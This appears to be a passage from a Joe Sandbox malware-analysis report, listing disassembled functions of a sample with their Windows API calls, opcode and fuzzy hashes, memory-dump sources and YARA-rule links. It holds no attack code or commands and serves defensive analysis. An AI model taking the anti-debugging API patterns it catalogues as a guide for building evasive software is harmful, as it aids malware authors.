Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 44b8f05af09cee8f5967418903d228d283fd67004b49e222f17b9879212ea133
Instruction ID: bb2ea6e48625e0632ae46b2ba47239ea73f1449de7e9520c187dd614facbc8a6
Opcode Fuzzy Hash: 44b8f05af09cee8f5967418903d228d283fd67004b49e222f17b9879212ea133
Instruction Fuzzy Hash: B1410971900669AFDB30EF6BCC889BFB379EF45306F104196E505D3280E6789E84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0049726A Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00497276
IsDebuggerPresent.KERNEL32 ref: 00497342
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0049735B
UnhandledExceptionFilter.KERNEL32(?), ref: 00497365

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: dbae2f770b5f68c949a14857b178855b7bf92d9fc0f266aa7afe5d05afdb737c
Instruction ID: 442527c3d827187e4d8ce4338e0b101b72e7960858cd13f4edf2a00f40db59ee
Opcode Fuzzy Hash: dbae2f770b5f68c949a14857b178855b7bf92d9fc0f266aa7afe5d05afdb737c
Instruction Fuzzy Hash: 79312975D052189BDF20DFA5DC497CDBBB8AF08305F1041AAE80DAB250EB759B88DF84

Uniqueness

Uniqueness Score: -1.00%

Function 004724B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 004724CB
FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 004724F2

Strings

!x-sys-default-locale, xrefs: 004724C6

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: cd79bbb978c5bb3489cf6d77012603f9965b9e78f7ea0b01a4e1ebb1db1ff8fc
Instruction ID: c7b576afc5ec86cce1e19306ec9318cb014bc8f22b7149d60231977d19d49169
Opcode Fuzzy Hash: cd79bbb978c5bb3489cf6d77012603f9965b9e78f7ea0b01a4e1ebb1db1ff8fc
Instruction Fuzzy Hash: 6FF03075610119FFFB189B99CD0ADEB7AACEB09794F108059BA06D6180E2F0AE00D775

Uniqueness

Uniqueness Score: -1.00%

Function 004F3570 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F35C4
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F360E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F36D4

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 4d9ec6c836bbce6ef50285691db116ee1620bd769697d7146288ec9fcd21ea5e
Instruction ID: 1cdc9ec792ebbbb7a46539b5befa97e62df99b28136104c88c3ac9bfddefed82
Opcode Fuzzy Hash: 4d9ec6c836bbce6ef50285691db116ee1620bd769697d7146288ec9fcd21ea5e
Instruction Fuzzy Hash: EF6195B151010B9FEF24AF29CD82B7A77E8EF04306F10806BEE05C6285E778DA95DB55

Uniqueness

Uniqueness Score: -1.00%

Function 004A8405 Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004A84FD
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004A8507
UnhandledExceptionFilter.KERNEL32(?), ref: 004A8514

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e1a3b15dccffe379c5dd170aefe6985605e9deae1ca44c3bf1101bb292f25153
Instruction ID: ba34d74176ab7d08a86d4c8f577662424a9e501ad34007481ef84d5651fe851a
Opcode Fuzzy Hash: e1a3b15dccffe379c5dd170aefe6985605e9deae1ca44c3bf1101bb292f25153
Instruction Fuzzy Hash: A631C274D01218ABCB21DF68D8887DDBBB4BF18351F5041EAE81CA7291EB749F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 004EDB23 Relevance: 1.8, APIs: 1, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65dd3414c6befd120c331aa0abc49a847ad014b3fe90ec27b51539937aee0292
Instruction ID: 4a1797fa3a3c23e63855082e03050c99c292b2e497e5c97cc4ad5b007b803259
Opcode Fuzzy Hash: 65dd3414c6befd120c331aa0abc49a847ad014b3fe90ec27b51539937aee0292
Instruction Fuzzy Hash: 3351D4B5C04219AFDB24DF6ACC89EABB7B9EF45305F14429EE809D3201EA359E44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004E245B Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?), ref: 004E2688

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 9644709f0407872747167c536b67c5a382f90bf6a99aecf6620f8d79d3d94960
Instruction ID: 11b22a042e54ec0560605dadca7490718b009da678b2aec19f9626016d7aad6e
Opcode Fuzzy Hash: 9644709f0407872747167c536b67c5a382f90bf6a99aecf6620f8d79d3d94960
Instruction Fuzzy Hash: 4AB19C31210648DFDB14CF29C68AB657BE0FF05366F258659E899CF3A1C379E982CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00496DE7 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00496DFD

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 541ba60e4a205aad5c3e4b3d3582a3f1d939016cbfb2cc98759125e362f067a0
Instruction ID: 918401ef7aafa049fa4500a7dff32d5603a1dd6c1edbc6953dfebf4dddf52057
Opcode Fuzzy Hash: 541ba60e4a205aad5c3e4b3d3582a3f1d939016cbfb2cc98759125e362f067a0
Instruction Fuzzy Hash: 03518CB29002058FDF25CF69D9817AABBF4FB58301F25842AD404EB394D7B8D944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004C2ABE Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

0, xrefs: 004C2C62

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e4d3b3a0527c84b859d2adfd20232531fc44543ababc2a19baf5d0c98ba72520
Instruction ID: 0ae791d9d68d9767a81040fcd8006ddffe510354c255e96fe3a491759709cf23
Opcode Fuzzy Hash: e4d3b3a0527c84b859d2adfd20232531fc44543ababc2a19baf5d0c98ba72520
Instruction Fuzzy Hash: 1CE1AC386006058FCBA4CF68C680FAEB3B1BF59314B24465FD456AB391D7F8AD46CB19

Uniqueness

Uniqueness Score: -1.00%

Function 004C2595 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

0, xrefs: 004C272A

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: a24f362dff006dc1e7b6482d034a995a2cfaf3e5a4c831384ef8cb1031f1138b
Instruction ID: 41e5119f526306b4d1acc626f9fc3164397dc5e378cd37386c237d350ea0885c
Opcode Fuzzy Hash: a24f362dff006dc1e7b6482d034a995a2cfaf3e5a4c831384ef8cb1031f1138b
Instruction Fuzzy Hash: 93E19A786006058FCBA4CF28C680F6BB7B1BF49714F20465ED4569B391D7F8AD46CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 004C2FFA Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

0, xrefs: 004C318F

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 2f2d4428172aa8692ce7a0ddc7b0177f7d58271d75a4f7425e53ed574fdced71
Instruction ID: 87a1717e1c612e3b9cc087b295cb815e9d0c1795dcbe4c5c8b3dea900a145c7e
Opcode Fuzzy Hash: 2f2d4428172aa8692ce7a0ddc7b0177f7d58271d75a4f7425e53ed574fdced71
Instruction Fuzzy Hash: E8E1E0386006058FCBA4CF29C480FAAB7F1BF45716B14C65FD8569B391C738AE46CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004C0FD3 Relevance: 1.6, Strings: 1, Instructions: 348COMMON

Download Yara Rule

Strings

0, xrefs: 004C1170

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 44bd80a55848843d9268c4174679b4220d3e7dd37c57f7574c112368e2721529
Instruction ID: 75110747941908263058b1894b3aeb3092207a3206d3abb170ad6954a8c7ed14
Opcode Fuzzy Hash: 44bd80a55848843d9268c4174679b4220d3e7dd37c57f7574c112368e2721529
Instruction Fuzzy Hash: 96C1E1386006858FDBA4CE19C490F7BB7B1AB06304F14465FD952977B3C72CAD86CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004C0B62 Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

0, xrefs: 004C0CF0

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9bf3755c65e33d07f3f58b2eecb98aaafe30167c29e6df8c8d676463f14da389
Instruction ID: b717708deac2a241112a2e1c969b1bb5a8c2c8d8f7c1c23551e185c1ec963217
Opcode Fuzzy Hash: 9bf3755c65e33d07f3f58b2eecb98aaafe30167c29e6df8c8d676463f14da389
Instruction Fuzzy Hash: B4C1BF7850060ACFCBA8CF58C480F7BBBA1AB45318F144A5FD45697391D738AD46CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004C1457 Relevance: 1.6, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

0, xrefs: 004C15E5

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 4c5b430d302cc772503a1466156be78016aad642246285530a7a51f295d34c2a
Instruction ID: f7e64eeb2442027ae759e10b129d742708a6afc44f747080afc2d57d69292679
Opcode Fuzzy Hash: 4c5b430d302cc772503a1466156be78016aad642246285530a7a51f295d34c2a
Instruction Fuzzy Hash: 45C1CF78A006469FCBA8CE18C490FBBB7B1AB46314F24461FD457977A3C738E846CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004F3857 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F38AB

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 395e9b84a2664f3d0d09253b97a5a01153e2984e7de119dd98d081dc66c0d918
Instruction ID: 7051b407396ca73d999f05aeca59df8d2f913e2356b94a58725cb4fdb878b59f
Opcode Fuzzy Hash: 395e9b84a2664f3d0d09253b97a5a01153e2984e7de119dd98d081dc66c0d918
Instruction Fuzzy Hash: 1F21B6B160420AABDB28AE25DC41E7B33A8EF44346B10406FFE01D6242EBBCAE44D754

Uniqueness

Uniqueness Score: -1.00%

Function 004C1D06 Relevance: 1.6, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

0, xrefs: 004C1EAD

Memory Dump Source

Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true

Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

